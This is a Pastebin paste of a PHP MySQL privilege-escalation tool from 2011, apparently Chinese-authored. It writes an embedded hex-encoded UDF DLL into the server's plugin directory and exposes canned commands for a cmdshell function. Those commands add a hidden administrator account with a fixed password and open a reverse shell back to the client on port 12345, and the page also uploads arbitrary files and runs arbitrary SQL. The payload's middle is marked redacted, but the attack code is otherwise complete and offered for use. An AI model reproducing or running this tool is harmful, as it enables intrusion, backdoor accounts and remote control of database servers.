Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if (get_magic_quotes_gpc()) {
- function stripslashes_deep($value)
- {
- $value = is_array($value) ?
- array_map('stripslashes_deep', $value) :
- stripslashes($value);
- return $value;
- }
- $_POST = array_map('stripslashes_deep', $_POST);
- $_GET = array_map('stripslashes_deep', $_GET);
- $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
- $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
- }
- session_start();
- if($_GET['action']=='logout'){
- foreach($_COOKIE["connect"] as $key=>$value){
- setcookie("connect[$key]","",time()-1);
- }
- header("Location:".$_SERVER["SCRIPT_NAME"]);
- }
- if(!empty($_POST['submit'])){
- setcookie("connect");
- setcookie("connect[host]",$_POST['host']);
- setcookie("connect[name]",$_POST['name']);
- setcookie("connect[pass]",$_POST['pass']);
- setcookie("connect[dbname]",$_POST['dbname']);
- echo "<!script>location.href='?action=connect'</script>";
- }
- /*
- foreach($_COOKIE["connect"] as $key=>$value){
- echo $key.":".$value."<br>";
- }
- */
- if(empty($_GET["action"])){
- ?>
- <form name="form1" method="post" action="?action=connect">
- <div align="center">
- <table width="294" height="140" border="1" cellpadding="1" cellspacing="5">
- <caption>
- <h5>基友菊花爆必备神器->MYSQL高版本提权工具</h5>
- </caption>
- <tr>
- <td width="66">host:</td>
- <td width="270"><input name="host" type="text" id="host" size="34"></td>
- </tr>
- <tr>
- <td>name:</td>
- <td><input name="name" type="text" id="name" size="34"></td>
- </tr>
- <tr>
- <td>pass:</td>
- <td><input name="pass" type="text" id="pass" size="34"></td>
- </tr>
- <tr>
- <td>dbname:</td>
- <td><input name="dbname" type="text" id="dbname" size="34"></td>
- </tr>
- <tr>
- <td colspan="2"><div align="center">
- <input type="submit" name="submit" value="提交">
-
- <input type="reset" name="Submit" value="重置">
- </div></td>
- </tr>
- </table>
- </div>
- </form>
- <div align="center"><strong>Copyright By Dark'mOon 2011</strong><br>
- Blog:<a href="http://www.moonhack.org" target="_blank">www.moonhack.org</a> Bbs:<a href="http://www.90sec.org" target="_blank">www.90sec.org</a>
- <a href="http://www.moonhack.org" target="_blank">版本更新 (version update)</a>
- </div>
- <?php
- exit;
- }
- $link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
- if(!$link){
- echo "连接失败.".mysql_error()."<!a href='javascr ipt:history.back()'>返回重填 (previous history)</a></script>";
- exit;
- }else{
- echo "连接成功 (connection success)<br>";
- $str=mysql_get_server_info();
- echo 'MYSQL版本 ( MySqlversion):'.$str."<br>";
- echo "<hr>";
- if($str[2]>=1){
- $sql="SHOW VARIABLES LIKE '%plugin_dir%'";
- $row=mysql_query($sql);
- $rows=mysql_fetch_row($row);
- $pa=str_replace('\\','/',$rows[1]);
- $path=$_SESSION['path']=$pa."/moonudf.dll";
- }else{
- $path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
- }}
- $conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
- if(!$conn){
- echo "数据不存在.".mysql_error()."<!a href='javas cript:history.back()'>返回重填</a></script>";
- exit;
- }else{
- echo "数据库--".$_COOKIE['connect']['dbname']."--存在<br>";
- }
- echo '<a href="?action=logout">点击退出 (mmd: click to exit)</a>';
- echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
- echo '<table width="297" height="53" border="1">';
- echo '<tr>';
- echo '<td colspan="2">当前路径 (mmd: curret path):';
- echo "<input name='p' type='text' size='27' value='".dirname(__FILE__)."\'></td>";
- echo '</tr>';
- echo '<tr>';
- echo '<td width="235"><input type="file" name="file"></td>';
- echo '<td width="46"><input type="submit" name="subfile" value="上传文件(upload file)"></td>';
- echo '</tr>';
- echo '</table>';
- echo'</form>';
- if($_POST['subfile']){
- $upfile=$_POST['p'].$_FILES['file']['name'];
- if(is_uploaded_file($_FILES['file']['tmp_name']))
- {
- if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
- echo '上传失败(upload failed)';
- }else{
- echo '上传成功(upload success),路径为(path)'.$upfile;
- }}}
- echo '<hr>';
- echo '<form action="?action=dll" method="post"/>';
- echo '<table cellpadding="1" cellspacing="2">';
- echo '<tr><td>路径目录为 (mmd: dir/path)</td></tr>';
- echo "<tr><td><input type='text' name='dll' size='40' value='$path'/></td>";
- echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
- echo '</table>';
- echo '</form>';
- echo '<hr>';
- if($_POST['subudf']){
- mysql_query('DROP TABLE Temp_udf');
- $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
- if(!$query){
- echo '创建临时表Temp_udf失败请查看失败内容 (Temp_udf failed to create a temporary table, please see the failure msg)'.mysql_error();
- }else{
- $shellcode=udfcode();
- $query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
- if(!mysql_query($query)){
- echo 'udf插入失败请查看失败内容(udf insertion failed, see error message)'.mysql_error();
- }else{
- $query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
- if(!mysql_query($query)){
- echo 'udf导出失败请查看失败内容(udf export failed. see error message)'.mysql_error();
- }else{
- mysql_query('DROP TABLE Temp_udf');
- echo '导出成功(export success)';
- }
- }
- }
- }
- echo '<form name="form2" method="post" action="">';
- echo '<table width="300" height="59" border="1.2" cellpadding="0" cellspacing="1">';
- echo '<tr>';
- echo '<td width="83">文件路径: (file path)</td>';
- echo '<td width="201"><input name="diy" type="text" id="diy" size="27"></td>';
- echo '</tr>';
- echo '<tr>';
- echo '<td>目标路径: (target path)</td>';
- echo '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
- echo '</tr>';
- echo '<tr>';
- echo '<td colspan="2">';
- echo '<div align="right">';
- echo '<input type="submit" name="Submit2" value="Custom Export">';
- echo '</div></td></tr>';
- echo '</table>';
- echo '</form>';
- if(!empty($_POST['diy'])){
- $diy=str_replace('\\','/',$_POST['diy']);
- $diypath=str_replace('\\','/',$_POST['diypath']);
- mysql_query('DROP TABLE diy_dll');
- $s='create table diy_dll (cmd LONGBLOB)';
- if(!mysql_query($s)){
- echo '创建diy_dll表失败 (diy_dll creation fails)'.mysql_error();
- }else{
- $s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
- if(!mysql_query($s)){
- echo "插入自定义文件失败 (custom file injection failed)".mysql_error();
- }else{
- $s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
- if(!mysql_query($s)){
- echo "导出自定义dll出错 (Export Custom DLL error)".mysql_error();
- }else{
- mysql_query('DROP TABLE diy_dll');
- echo "成功导出自定义dll (Export Custom DLL Success)<br>";
- }}}}
- echo "<hr>";
- echo '自带命令 (shell command):<br>';
- echo '<form action="" method="post">';
- echo '<select name="mysql">';
- echo '<option value="create function cmdshell returns string soname \'moonudf.dll\'">创建cmdshell</option>';
- echo '<option value="select cmdshell(\'net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add\')">添加超级管理员</option>';
- echo '<option value="select cmdshell(\'net user\')">查看用户 (View user))</option>';
- echo '<option value="select cmdshell(\'netstat -an\')">查看端口 (View Port)</option>';
- echo '<option value="select name from mysql.func">查看创建函数 (See created function)</option>';
- echo '<option value="delete from mysql.func where name=\'cmdshell\'">删除cmdshell</option>';
- echo '<option value="create function backshell returns string soname \'moonudf.dll\'">创建反弹函数 (Create backconnect)</option>';
- echo '<option value="select backshell(\''.$_SERVER["REMOTE_ADDR"].'\',12345)">执行反弹(Backconnect exec..)</option>';
- echo '<option value="delete from mysql.func where name=\'backshell\'">删除backshell</option>';
- echo '</select>';
- echo '<input type="submit" value="提交(Submit)" />';
- echo '</form>';
- echo '<form action="?action=sql" method="post">';
- echo '自定义SQL语句 (Custom SQL cmd):<br>';
- echo '<textarea name="mysql" cols="40" rows="6"></textarea>';
- echo '<input type="submit" value="执行" />';
- echo '</form>';
- echo "回显结果 (Echo Results):<br>";
- echo '<textarea cols="50" rows="10" id="contactus" name="contactus">';
- if(!empty($_POST['mysql'])){
- echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
- $sql=mysql_query($sql) or die(mysql_error());
- while($rows=@mysql_fetch_row($sql)){
- foreach($rows as $value){
- echo $value;
- }}}
- echo '</textarea><br>';
- echo '<hr>';
- print("
- 功能说明 (Functionality Description):<br>
- MYSQL=>5.1<br>
- 自动获取高版本mysql调用函数路径(测试mysql5.5)(Mysql recent version autocalls paths/tested in v5.5)<br>
- MYSQL<=5.0默认为系统目录(defaults to system directory)<br>
- 自定义导出dll (Customize DLL export) <br>
- 默认udf自带函数(Udf comes with default function)<br>
- cmdshell 执行cmd;<br>
- downloader 下载者,到网上下载指定文件并保存到指定目录;<br>
- open3389 通用开3389终端服务,可指定端口(不改端口无需重启);<br>
- backshell 反弹Shell;<br>
- ProcessView 枚举系统进程;<br>
- KillProcess 终止指定进程;<br>
- regread 读注册表;<br>
- regwrite 写注册表;<br>
- shut 关机,注销,重启;<br>
- about 说明与帮助函数;<br>
- 默认添加管理员账号$darkmoon 密码123456 (Add $darkmoon as default admin acct, pwd:123456)<br>
- 默认反弹端口12345(default backconnect port 12345)<br>
- 不要随便删除刚创建的函数 重新生效要mysql重启(Do not delete the newly created function revalidation to restart mysql)<br>
- 别人的udf 请自行看别人的udf说明(Others udf pls see others' description)<br>
- 常用命令(common commands)<br>
- create function cmdshell returns string soname 'moonudf.dll'<br>
- select cmdshell('命令')<br>
- select backshell('你的ip',12345)<br>
- nc -l -p 12345
- ");
- function udfcode(){return "0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c001009000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e557061636b000000b00100001000000000000000000000000000000000000000000000600000e02e727372630000000050010000c00100e6da000000020000000000000000000000000000600000e088010010e89a02101b0000000e000000001000106b970210b7970210ba970210c8970210a3970210fc0f0010de960210e0960210809502101dba0110ed970210ffaf0110d2960210000400007c070000c40b0000b30200006604000090c0011000000000ffffffff0100000001000000010000000100000000000000000000000000000001000
- ///////////////////////// REDACTED FOR THE SECURITY PURPOSE //////////////////////////////////////
- 5696e69740050726f63657373566965775f696e69740061626f75740061626f75745f6465696e69740061626f75745f696e6974006261636b7368656c6c006261636b7368656c6c5f6465696e6974006261636b7368656c6c5f696e697400636d647368656c6c00636d647368656c6c5f6465696e697400636d647368656c6c5f696e697400646f776e6c6f6164657200646f776e6c6f616465725f6465696e697400646f776e6c6f616465725f696e6974006f70656e33333839006f70656e333338395f6465696e6974006f70656e333338395f696e6974007265677265616400726567726561645f6465696e697400726567726561645f696e69740072656777726974650072656777726974655f6465696e69740072656777726974655f696e6974007368757400736875745f6465696e697400736875745f696e697400";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement